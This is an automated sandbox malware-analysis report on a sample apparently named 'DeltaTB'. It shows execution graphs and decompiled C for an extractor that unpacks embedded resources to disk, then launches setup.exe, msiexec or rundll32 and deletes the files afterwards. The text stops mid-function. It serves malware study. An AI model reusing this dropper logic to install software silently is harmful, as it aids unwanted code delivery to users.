                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:29.5%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:6.6%
                                                                                                                                                              Total number of Nodes:136
                                                                                                                                                              Total number of Limit Nodes:1
                                                                                                                                                              execution_graph 800 9a23ab VirtualFree 964 9a23a0 965 9a2236 VirtualAlloc 964->965 966 9a23a9 965->966 801 9a15a7 821 9a1b83 LoadLibraryA 801->821 811 9a16fe 872 9a17bc 811->872 812 9a16a8 _wcslen 815 9a16c8 812->815 816 9a16b5 812->816 814 9a1709 ExitProcess 875 9a121f 815->875 851 9a12e1 816->851 817 9a1619 820 9a16c4 817->820 847 9a14dc FindResourceW 817->847 820->811 857 9a1889 820->857 822 9a1bb1 GetProcAddress 821->822 828 9a1f51 821->828 824 9a1c34 LoadLibraryA 822->824 826 9a1c9e LoadLibraryA 824->826 825 9a15d6 829 9a1000 825->829 826->828 885 9a3bc5 828->885 894 9a1372 829->894 832 9a101c FindResourceW 834 9a1045 832->834 835 9a1034 832->835 833 9a1015 833->814 843 9a154e 833->843 834->833 901 9a17f0 834->901 926 9a1b44 LoadResource 835->926 839 9a1081 907 9a1985 839->907 840 9a1075 841 9a17bc VirtualFree 840->841 841->833 844 9a1552 843->844 845 9a14dc 4 API calls 844->845 846 9a157c _wcscat _wcscpy 845->846 846->817 848 9a1502 847->848 849 9a1511 _wcsncpy 847->849 850 9a1b44 3 API calls 848->850 849->812 850->849 852 9a1313 _wcsncpy 851->852 853 9a135d 852->853 856 9a121f 12 API calls 852->856 854 9a3bc5 5 API calls 853->854 855 9a136c 854->855 855->820 856->852 858 9a18a9 857->858 859 9a18ac GetCurrentDirectoryW 857->859 858->859 860 9a18cd SetCurrentDirectoryW 859->860 861 9a18c2 GetLastError 859->861 860->861 862 9a18d8 _wcslen 860->862 867 9a1957 861->867 865 9a1959 SetCurrentDirectoryW 862->865 862->867 868 9a1941 DeleteFileW 862->868 869 9a1889 5 API calls 862->869 871 9a1938 RemoveDirectoryW 862->871 863 9a3bc5 5 API calls 864 9a16f4 RemoveDirectoryW 863->864 864->811 866 9a196a GetLastError 865->866 865->867 866->867 867->863 868->862 870 9a194c GetLastError 868->870 869->862 870->862 870->867 871->862 873 9a17c3 VirtualFree 872->873 874 9a17d1 872->874 873->874 874->814 876 9a1255 _wcscpy 875->876 877 9a221a 2 API calls 876->877 878 9a1296 _wcscat 877->878 879 9a12a6 FindFirstFileW 878->879 880 9a12c5 879->880 881 9a12b8 879->881 882 9a3bc5 5 API calls 880->882 943 9a10d8 881->943 884 9a12db 882->884 884->820 886 9a3bcf IsDebuggerPresent 885->886 887 9a3bcd 885->887 893 9a3dc2 886->893 887->825 890 9a3d89 SetUnhandledExceptionFilter UnhandledExceptionFilter 891 9a3dae GetCurrentProcess TerminateProcess 890->891 892 9a3da6 890->892 891->825 892->891 893->890 898 9a1396 894->898 895 9a14c7 896 9a3bc5 5 API calls 895->896 897 9a1011 896->897 897->832 897->833 898->895 929 9a221a lstrlenW 898->929 902 9a1803 901->902 903 9a1071 902->903 932 9a2236 902->932 903->839 903->840 905 9a1863 935 9a23bd 905->935 908 9a19a9 GetCurrentDirectoryW 907->908 909 9a19a6 907->909 910 9a19ca SetCurrentDirectoryW 908->910 911 9a19bf GetLastError 908->911 909->908 910->911 919 9a19d5 _wcslen 910->919 914 9a1a9f 911->914 912 9a3bc5 5 API calls 915 9a1b40 912->915 913 9a1b1c SetCurrentDirectoryW 913->911 913->914 914->912 915->833 916 9a1a6f CreateDirectoryW 918 9a1a7c GetLastError 916->918 916->919 917 9a1aa4 DeleteFileW 920 9a1aba CreateFileW 917->920 921 9a1aaf GetLastError 917->921 918->914 918->919 919->913 919->914 919->916 919->917 923 9a1985 5 API calls 919->923 920->914 922 9a1ad9 WriteFile 920->922 921->914 921->920 924 9a1b0b FindCloseChangeNotification 922->924 925 9a1afb SetFileTime 922->925 923->919 924->919 925->924 927 9a1b5a SizeofResource LockResource 926->927 928 9a1b7b 926->928 927->928 928->834 930 9a2229 lstrcatW 929->930 931 9a143e wsprintfW CreateDirectoryW 929->931 930->931 931->895 931->898 933 9a223d 932->933 934 9a2240 VirtualAlloc 932->934 933->905 934->905 936 9a23de 935->936 938 9a23d9 935->938 936->938 939 9a3a8f 936->939 938->903 941 9a3af2 939->941 940 9a3bc5 5 API calls 942 9a3bc3 940->942 941->940 942->938 944 9a110b _wcscpy 943->944 945 9a221a 2 API calls 944->945 946 9a1128 945->946 947 9a1139 946->947 950 9a118a 946->950 960 9a109d 947->960 951 9a11b5 wsprintfW 950->951 953 9a11bf CreateProcessW 951->953 952 9a221a 2 API calls 954 9a1168 wsprintfW 952->954 955 9a11e7 GetExitCodeProcess 953->955 959 9a11e2 953->959 954->953 955->959 956 9a3bc5 5 API calls 958 9a1215 956->958 958->880 959->956 961 9a10c2 960->961 962 9a3bc5 5 API calls 961->962 963 9a10d4 962->963 963->952

                                                                                                                                                              Callgraph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                              • Disassembly available
                                                                                                                                                              callgraph 0 Function_009A221A 1 Function_009A10D8 1->0 2 Function_009A1718 1->2 6 Function_009A109D 1->6 17 Function_009A3C02 1->17 22 Function_009A3BC5 1->22 3 Function_009A121F 3->0 3->1 3->2 10 Function_009A3BD4 3->10 3->17 3->22 4 Function_009A14DC 20 Function_009A1B44 4->20 37 Function_009A3C21 4->37 5 Function_009A17DD 6->22 7 Function_009A3110 8 Function_009A3DD0 9 Function_009A2254 11 Function_009A3A4A 12 Function_009A1889 12->5 12->12 12->22 34 Function_009A3CA2 12->34 13 Function_009A3189 13->7 24 Function_009A243C 13->24 14 Function_009A154E 14->4 14->10 14->17 15 Function_009A3A8F 15->11 15->22 27 Function_009A39F2 15->27 28 Function_009A37B2 15->28 16 Function_009A3DC2 18 Function_009A1B83 18->22 19 Function_009A1000 19->20 21 Function_009A1985 19->21 23 Function_009A17BC 19->23 26 Function_009A1372 19->26 30 Function_009A17F0 19->30 21->5 21->21 21->22 21->34 22->16 25 Function_009A23BD 25->9 25->15 26->0 26->22 28->7 28->13 29 Function_009A31F3 28->29 30->8 30->25 31 Function_009A2236 30->31 32 Function_009A23AB 33 Function_009A3C6B 35 Function_009A23A0 35->31 36 Function_009A12E1 36->3 36->22 36->37 38 Function_009A15A7 38->3 38->4 38->12 38->14 38->18 38->19 38->23 38->33 38->34 38->36

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 009A121F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 144 9a121f-9a126b call 9a3c02 call 9a1718 149 9a126d-9a126f 144->149 150 9a1277-9a12b6 call 9a3c02 call 9a221a call 9a3bd4 FindFirstFileW 144->150 149->150 157 9a12b8-9a12c0 call 9a10d8 150->157 158 9a12c7-9a12c9 150->158 164 9a12c5 157->164 159 9a12ca-9a12de call 9a3bc5 158->159 164->159
                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                              			E009A121F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				char _v1068;
				struct _WIN32_FIND_DATAW _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t54;
				void* _t55;
				WCHAR* _t57;
				void* _t58;
				signed int _t59;
				signed int _t61;

				_t61 = (_t59 & 0xfffffff8) - 0x67c;
				_v8 =  *0x9a5000 ^ _t61;
				_t38 = __edx;
				_v1664 = _a4;
				_t54 = __ecx;
				E009A3C02( &_v1068, __edx);
				_t52 =  &_v1068;
				_t23 = E009A1718(L".dll,",  &_v1068);
				if(_t23 != 0xffffffff) {
					 *((short*)(_t61 + 0x268 + _t23 * 2)) = 0;
				}
				E009A3C02( &_v540, _t54 + 0x44);
				_t57 =  &_v540;
				E009A221A(_t57);
				E009A3BD4(_t57,  &_v1068);
				_t33 = FindFirstFileW(_t57,  &_v1660);
				_t65 = _t33 - 0xffffffff;
				if(_t33 == 0xffffffff) {
					_t34 = 5;
				} else {
					 *((intOrPtr*)(_t54 + 0x34))(_t33);
					_t34 = E009A10D8(_t38, _t54, _t65, _v1668);
				}
				_pop(_t55);
				_pop(_t58);
				_pop(_t39);
				return E009A3BC5(_t34, _t39, _v8 ^ _t61, _t52, _t55, _t58);
			}






















                                                                                                                                                              0x009a1225
                                                                                                                                                              0x009a1232
                                                                                                                                                              0x009a123f
                                                                                                                                                              0x009a1241
                                                                                                                                                              0x009a124e
                                                                                                                                                              0x009a1250
                                                                                                                                                              0x009a125c
                                                                                                                                                              0x009a1263
                                                                                                                                                              0x009a126b
                                                                                                                                                              0x009a126f
                                                                                                                                                              0x009a126f
                                                                                                                                                              0x009a1283
                                                                                                                                                              0x009a128a
                                                                                                                                                              0x009a1291
                                                                                                                                                              0x009a12a1
                                                                                                                                                              0x009a12b0
                                                                                                                                                              0x009a12b3
                                                                                                                                                              0x009a12b6
                                                                                                                                                              0x009a12c9
                                                                                                                                                              0x009a12b8
                                                                                                                                                              0x009a12b9
                                                                                                                                                              0x009a12c0
                                                                                                                                                              0x009a12c0
                                                                                                                                                              0x009a12d1
                                                                                                                                                              0x009a12d2
                                                                                                                                                              0x009a12d3
                                                                                                                                                              0x009a12de

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcscpy$FileFindFirst_wcscat
                                                                                                                                                              • String ID: .dll,$setup.exe
                                                                                                                                                              • API String ID: 2931365424-1808119565
                                                                                                                                                              • Opcode ID: 13a93b0c1a2d363a64ad0b7da053c1d3a7a9c98b456ce71bb8732e22e544a326
                                                                                                                                                              • Instruction ID: 6985b598b0851a13d65324fcf39ea046092731655737168dfe80ed8c7e850402
                                                                                                                                                              • Opcode Fuzzy Hash: 13a93b0c1a2d363a64ad0b7da053c1d3a7a9c98b456ce71bb8732e22e544a326
                                                                                                                                                              • Instruction Fuzzy Hash: 9E11547210C2045BC724EA689C4AA9BB7DDEFC9330F104A1BF569C2590EF31A51487D5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A1985 Relevance: 19.6, APIs: 13, Instructions: 142filetimeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E009A1985(signed int* __ecx, intOrPtr __edx, WCHAR* _a4, char _a8) {
				signed int _v8;
				short _v540;
				intOrPtr _v544;
				long _v548;
				struct _FILETIME _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t36;
				intOrPtr _t39;
				int _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				int _t49;
				WCHAR* _t51;
				int _t59;
				intOrPtr _t61;
				intOrPtr _t67;
				char* _t72;
				intOrPtr _t73;
				WCHAR* _t74;
				intOrPtr* _t76;
				signed int _t77;

				_t73 = __edx;
				_v8 =  *0x9a5000 ^ _t77;
				_t74 = _a4;
				_t76 = __ecx;
				if(_a8 != 0) {
					 *__ecx =  *__ecx & 0x00000000;
				}
				if(GetCurrentDirectoryW(0x104,  &_v540) != 0) {
					_t36 = SetCurrentDirectoryW(_t74); // executed
					if(_t36 == 0) {
						goto L3;
					} else {
						while(1) {
							_t39 =  *_t76;
							if(_t39 >=  *((intOrPtr*)(_t76 + 4))) {
								break;
							}
							_t67 =  *((intOrPtr*)(_t76 + 8));
							_t74 =  *(_t67 + _t39);
							_t42 = _t39 + 4;
							 *_t76 = _t42;
							_v548 = _t74;
							_t73 =  *((intOrPtr*)(_t42 + _t67));
							_t43 = _t42 + 4;
							_v560 = _t73;
							 *_t76 = _t43;
							if(_t73 == 2) {
								break;
							} else {
								if(_t73 == 0 &&  *((intOrPtr*)(_t76 + 0xc)) > 1) {
									_v544 = _t67 + _t43;
									_v544 = _v544 -  &_v556;
									do {
										_t72 = _t77 + _t73 - 0x228;
										_t73 = _t73 + 1;
										 *_t72 =  *((intOrPtr*)(_v544 + _t72));
									} while (_t73 < 8);
									 *_t76 = _t43 + 8;
								}
								_t61 =  *_t76;
								 *_t76 = _t61 + _t74;
								E009A17DD(_t76);
								_t74 =  *_t76 +  *((intOrPtr*)(_t76 + 8));
								 *_t76 =  *_t76 + E009A3CA2(_t74) + _t46 + 2;
								E009A17DD(_t76);
								if(_v560 != 1) {
									_t49 = DeleteFileW(_t74); // executed
									if(_t49 != 0 || GetLastError() == 2) {
										_t51 = CreateFileW(_t74, 0x40000000, 0, 0, 2, 0x80, 0); // executed
										_t74 = _t51;
										if(_t74 == 0xffffffff) {
											_t37 = 9;
										} else {
											WriteFile(_t74,  *((intOrPtr*)(_t76 + 8)) + _t61, _v548,  &_v548, 0); // executed
											if( *((intOrPtr*)(_t76 + 0xc)) > 1) {
												SetFileTime(_t74,  &_v556,  &_v556,  &_v556); // executed
											}
											FindCloseChangeNotification(_t74); // executed
											continue;
										}
									}
								} else {
									_t59 = CreateDirectoryW(_t74, 0); // executed
									if(_t59 != 0 || GetLastError() == 0xb7) {
										_t37 = E009A1985(_t76, _t73, _t74, 0); // executed
										if(_t37 == 0) {
											continue;
										} else {
										}
									}
								}
							}
							goto L26;
						}
						_t41 = SetCurrentDirectoryW( &_v540); // executed
						if(_t41 == 0) {
							goto L3;
						} else {
							_t37 = 0;
						}
					}
				} else {
					L3:
					_t37 = GetLastError();
				}
				L26:
				return E009A3BC5(_t37, _t61, _v8 ^ _t77, _t73, _t74, _t76);
			}



























                                                                                                                                                              0x009a1985
                                                                                                                                                              0x009a1995
                                                                                                                                                              0x009a199f
                                                                                                                                                              0x009a19a2
                                                                                                                                                              0x009a19a4
                                                                                                                                                              0x009a19a6
                                                                                                                                                              0x009a19a6
                                                                                                                                                              0x009a19bd
                                                                                                                                                              0x009a19cb
                                                                                                                                                              0x009a19d3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a19d5
                                                                                                                                                              0x009a19d5
                                                                                                                                                              0x009a19d5
                                                                                                                                                              0x009a19da
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a19e0
                                                                                                                                                              0x009a19e3
                                                                                                                                                              0x009a19e6
                                                                                                                                                              0x009a19e9
                                                                                                                                                              0x009a19eb
                                                                                                                                                              0x009a19f1
                                                                                                                                                              0x009a19f4
                                                                                                                                                              0x009a19f7
                                                                                                                                                              0x009a19fd
                                                                                                                                                              0x009a1a02
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1a08
                                                                                                                                                              0x009a1a0a
                                                                                                                                                              0x009a1a14
                                                                                                                                                              0x009a1a20
                                                                                                                                                              0x009a1a26
                                                                                                                                                              0x009a1a2c
                                                                                                                                                              0x009a1a36
                                                                                                                                                              0x009a1a37
                                                                                                                                                              0x009a1a39
                                                                                                                                                              0x009a1a41
                                                                                                                                                              0x009a1a41
                                                                                                                                                              0x009a1a43
                                                                                                                                                              0x009a1a48
                                                                                                                                                              0x009a1a4a
                                                                                                                                                              0x009a1a51
                                                                                                                                                              0x009a1a5e
                                                                                                                                                              0x009a1a61
                                                                                                                                                              0x009a1a6d
                                                                                                                                                              0x009a1aa5
                                                                                                                                                              0x009a1aad
                                                                                                                                                              0x009a1acc
                                                                                                                                                              0x009a1ad2
                                                                                                                                                              0x009a1ad7
                                                                                                                                                              0x009a1b19
                                                                                                                                                              0x009a1ad9
                                                                                                                                                              0x009a1aef
                                                                                                                                                              0x009a1af9
                                                                                                                                                              0x009a1b05
                                                                                                                                                              0x009a1b05
                                                                                                                                                              0x009a1b0c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1b0c
                                                                                                                                                              0x009a1ad7
                                                                                                                                                              0x009a1a6f
                                                                                                                                                              0x009a1a72
                                                                                                                                                              0x009a1a7a
                                                                                                                                                              0x009a1a92
                                                                                                                                                              0x009a1a99
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1a9f
                                                                                                                                                              0x009a1a99
                                                                                                                                                              0x009a1a7a
                                                                                                                                                              0x009a1a6d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1a02
                                                                                                                                                              0x009a1b23
                                                                                                                                                              0x009a1b2b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1b31
                                                                                                                                                              0x009a1b31
                                                                                                                                                              0x009a1b31
                                                                                                                                                              0x009a1b2b
                                                                                                                                                              0x009a19bf
                                                                                                                                                              0x009a19bf
                                                                                                                                                              0x009a19bf
                                                                                                                                                              0x009a19bf
                                                                                                                                                              0x009a1b33
                                                                                                                                                              0x009a1b41

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 009A19B5
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A19BF
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 009A19CB
                                                                                                                                                              • _wcslen.LIBCMT ref: 009A1A55
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 009A1A72
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A1A7C
                                                                                                                                                              • DeleteFileW.KERNELBASE(?), ref: 009A1AA5
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A1AAF
                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 009A1ACC
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000), ref: 009A1AEF
                                                                                                                                                              • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 009A1B05
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009A1B0C
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 009A1B23
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryFile$CurrentErrorLast$Create$ChangeCloseDeleteFindNotificationTimeWrite_wcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 113073435-0
                                                                                                                                                              • Opcode ID: 19d29e3f5b189c42309ce868db82e56a1a5aeaf2e8ee473f6d6fadcdb60d298d
                                                                                                                                                              • Instruction ID: af737f9a2d93dd38fd893e85b273ed74e1d369df443418818c6923238f2b61ce
                                                                                                                                                              • Opcode Fuzzy Hash: 19d29e3f5b189c42309ce868db82e56a1a5aeaf2e8ee473f6d6fadcdb60d298d
                                                                                                                                                              • Instruction Fuzzy Hash: C4517D31604214AFD7309F65EC88BBA77BDEF97310F244459E586D21A0E7709981EFA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A10D8 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 111processCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                              			E009A10D8(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t49;
				WCHAR* _t51;
				int _t57;
				long _t63;
				void* _t65;
				void* _t86;
				void* _t89;
				void* _t90;
				signed int _t91;
				void* _t93;

				_t86 = __edi;
				_t74 = __ebx;
				_t91 = _t93 - 0x80c;
				 *(_t91 + 0x808) =  *0x9a5000 ^ _t91;
				 *((intOrPtr*)(_t91 - 0x28)) =  *((intOrPtr*)(_t91 + 0x814));
				_push(_t91 - 0x80);
				 *(_t91 - 0x80) = 0x44;
				 *((intOrPtr*)(__edi + 0x1c))();
				E009A3C02(_t91 + 0x5fc, __edi + 0x44);
				E009A221A(_t91 + 0x5fc);
				_t85 = __ebx;
				if(E009A1718(L".dll,", __ebx) == 0xffffffff) {
					_t85 = __ebx;
					_t49 = E009A1718(L".msi", __ebx);
					_push( *((intOrPtr*)(_t91 - 0x28)));
					_push(__ebx);
					_push(_t91 + 0x5fc);
					_t51 = _t91 - 0x24;
					if(_t49 == 0xffffffff) {
						_push(L"\"%s%s\" %s");
					} else {
						_push(L"msiexec /i \"%s%s\" %s");
					}
					wsprintfW(_t51, ??);
				} else {
					_t65 = E009A109D(__edi);
					_push(_t91 + 0x3f0);
					_push(0);
					_push(0);
					_push(0x25 + (0 | _t65 != 0x00000000) * 4);
					_push(0);
					 *((intOrPtr*)(__edi + 0x20))();
					_t90 = _t91 + 0x3f0;
					E009A221A(_t90);
					wsprintfW(_t91 - 0x24, L"\"%srundll32.exe\"  \"%s%s\" %s", _t90, _t91 + 0x5fc, __ebx,  *((intOrPtr*)(_t91 - 0x28)));
				}
				_t57 = CreateProcessW(0, _t91 - 0x24, 0, 0, 0, 0, 0, _t86 + 0x44, _t91 - 0x80, _t91 - 0x3c); // executed
				_pop(_t89);
				if(_t57 != 0) {
					 *((intOrPtr*)(_t86 + 0x24))( *(_t91 - 0x3c), 0xffffffff);
					GetExitCodeProcess( *(_t91 - 0x3c), _t91 - 0x2c);
					 *((intOrPtr*)(_t86 + 0x2c))( *(_t91 - 0x3c));
					 *((intOrPtr*)(_t86 + 0x2c))( *((intOrPtr*)(_t91 - 0x38)));
					_t63 =  *(_t91 - 0x2c);
				} else {
					_t63 = 0xc;
				}
				return E009A3BC5(_t63, _t74,  *(_t91 + 0x808) ^ _t91, _t85, _t86, _t89);
			}














                                                                                                                                                              0x009a10d8
                                                                                                                                                              0x009a10d8
                                                                                                                                                              0x009a10d9
                                                                                                                                                              0x009a10ed
                                                                                                                                                              0x009a10f9
                                                                                                                                                              0x009a1100
                                                                                                                                                              0x009a1101
                                                                                                                                                              0x009a1108
                                                                                                                                                              0x009a1116
                                                                                                                                                              0x009a1123
                                                                                                                                                              0x009a112d
                                                                                                                                                              0x009a1137
                                                                                                                                                              0x009a118f
                                                                                                                                                              0x009a1191
                                                                                                                                                              0x009a1196
                                                                                                                                                              0x009a11a2
                                                                                                                                                              0x009a11a3
                                                                                                                                                              0x009a11a4
                                                                                                                                                              0x009a11a7
                                                                                                                                                              0x009a11b0
                                                                                                                                                              0x009a11a9
                                                                                                                                                              0x009a11a9
                                                                                                                                                              0x009a11a9
                                                                                                                                                              0x009a11b6
                                                                                                                                                              0x009a1139
                                                                                                                                                              0x009a113a
                                                                                                                                                              0x009a114c
                                                                                                                                                              0x009a114f
                                                                                                                                                              0x009a1150
                                                                                                                                                              0x009a1158
                                                                                                                                                              0x009a1159
                                                                                                                                                              0x009a115a
                                                                                                                                                              0x009a115d
                                                                                                                                                              0x009a1163
                                                                                                                                                              0x009a117f
                                                                                                                                                              0x009a1185
                                                                                                                                                              0x009a11d7
                                                                                                                                                              0x009a11dd
                                                                                                                                                              0x009a11e0
                                                                                                                                                              0x009a11ec
                                                                                                                                                              0x009a11f6
                                                                                                                                                              0x009a11fc
                                                                                                                                                              0x009a1202
                                                                                                                                                              0x009a1205
                                                                                                                                                              0x009a11e2
                                                                                                                                                              0x009a11e4
                                                                                                                                                              0x009a11e4
                                                                                                                                                              0x009a121c

                                                                                                                                                              APIs
                                                                                                                                                              • _wcscpy.LIBCMT ref: 009A1116
                                                                                                                                                                • Part of subcall function 009A221A: lstrlenW.KERNEL32(?,009A143E), ref: 009A221B
                                                                                                                                                                • Part of subcall function 009A221A: lstrcatW.KERNEL32(?,009A4238), ref: 009A222F
                                                                                                                                                              • wsprintfW.USER32 ref: 009A117F
                                                                                                                                                              • wsprintfW.USER32 ref: 009A11B6
                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 009A11D7
                                                                                                                                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 009A11F6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Processwsprintf$CodeCreateExit_wcscpylstrcatlstrlen
                                                                                                                                                              • String ID: "%s%s" %s$"%srundll32.exe" "%s%s" %s$.dll,$.msi$msiexec /i "%s%s" %s$setup.exe
                                                                                                                                                              • API String ID: 1002973698-2298058916
                                                                                                                                                              • Opcode ID: c834fe887962dd9a72287f4f51ae1996e3e938dd3d354d20f24b6306c5b51e77
                                                                                                                                                              • Instruction ID: a48203150a27d70abc36bd94cfb22c3c3ff3dc9d577badf3db6f626df91fff48
                                                                                                                                                              • Opcode Fuzzy Hash: c834fe887962dd9a72287f4f51ae1996e3e938dd3d354d20f24b6306c5b51e77
                                                                                                                                                              • Instruction Fuzzy Hash: 0C315F7190410AAFCB149FA4DC49EEE7BBCFF49314F108225FA16E2150EB34AA558BE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A15A7 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 66 9a15a7-9a1605 call 9a1b83 call 9a1000 72 9a160b-9a161d call 9a154e 66->72 73 9a1715-9a1716 66->73 77 9a16e3-9a16f8 call 9a1889 RemoveDirectoryW 72->77 78 9a1623-9a162c 72->78 75 9a170f ExitProcess 73->75 85 9a16fe-9a170c call 9a17bc 77->85 80 9a169a-9a16b3 call 9a14dc call 9a3ca2 78->80 81 9a162e 78->81 95 9a16c8-9a16d7 call 9a121f 80->95 96 9a16b5-9a16bf call 9a12e1 80->96 84 9a1634-9a1646 call 9a3c6b 81->84 93 9a1648-9a165a call 9a3c6b 84->93 94 9a1689 84->94 85->73 99 9a170e 85->99 93->94 104 9a165c-9a166e call 9a3c6b 93->104 98 9a168d-9a1698 94->98 105 9a16dc-9a16e1 95->105 103 9a16c4-9a16c6 96->103 98->80 98->84 99->75 103->105 108 9a1670-9a1682 call 9a3c6b 104->108 109 9a1684-9a1687 104->109 105->77 105->85 108->98 108->109 109->98
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			_entry_() {
				void* _t36;
				void* _t46;
				int _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				int _t54;
				void* _t56;
				void* _t62;
				int _t64;
				signed int _t65;
				void* _t66;
				signed int _t71;
				void* _t72;
				void* _t73;
				void* _t74;

				_t71 = _t72 - 0x9c0;
				_t73 = _t72 - 0xa3c;
				 *(_t71 + 0x9bc) =  *0x9a5000 ^ _t71;
				_t54 = 0;
				_t67 = _t71 - 0x78;
				 *((char*)(_t71 - 0x79)) = 0;
				 *(_t71 - 0x7a) = 1;
				E009A1B83(_t71 - 0x78);
				 *((intOrPtr*)(_t71 + 0x1dc)) = 0;
				 *((intOrPtr*)(_t71 + 0x1e0)) = 0;
				 *((intOrPtr*)(_t71 + 0x1e4)) = 0;
				 *((intOrPtr*)(_t71 + 0x1e8)) = 3;
				 *((intOrPtr*)(_t71 + 0x1d8)) =  *((intOrPtr*)(_t71 - 0x3c))(0, _t62, _t66, _t53);
				_t36 = E009A1000(_t67, _t56, _t61, _t74); // executed
				if(_t36 != 0) {
					L19:
					ExitProcess(_t54);
					L18:
				}
				_t64 = E009A154E(_t67, _t71 + 0x1ec);
				if(_t64 != 0) {
					L15:
					E009A1889(_t54, _t71 + 0x1dc, _t61, _t71 - 0x34, 1); // executed
					RemoveDirectoryW(_t71 - 0x34); // executed
					L16:
					E009A17BC(_t71 + 0x1dc);
					if( *((intOrPtr*)(_t71 - 0x79)) == _t54) {
						goto L19;
					}
